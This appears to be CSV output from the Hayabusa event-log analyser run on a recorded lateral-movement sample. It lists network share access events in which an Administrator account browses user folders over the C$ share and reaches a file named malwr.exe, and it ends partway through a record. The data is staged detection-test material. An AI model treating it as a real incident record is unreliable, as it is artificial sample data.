2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States | IP Addr: 
10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links | IP Addr: 
10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 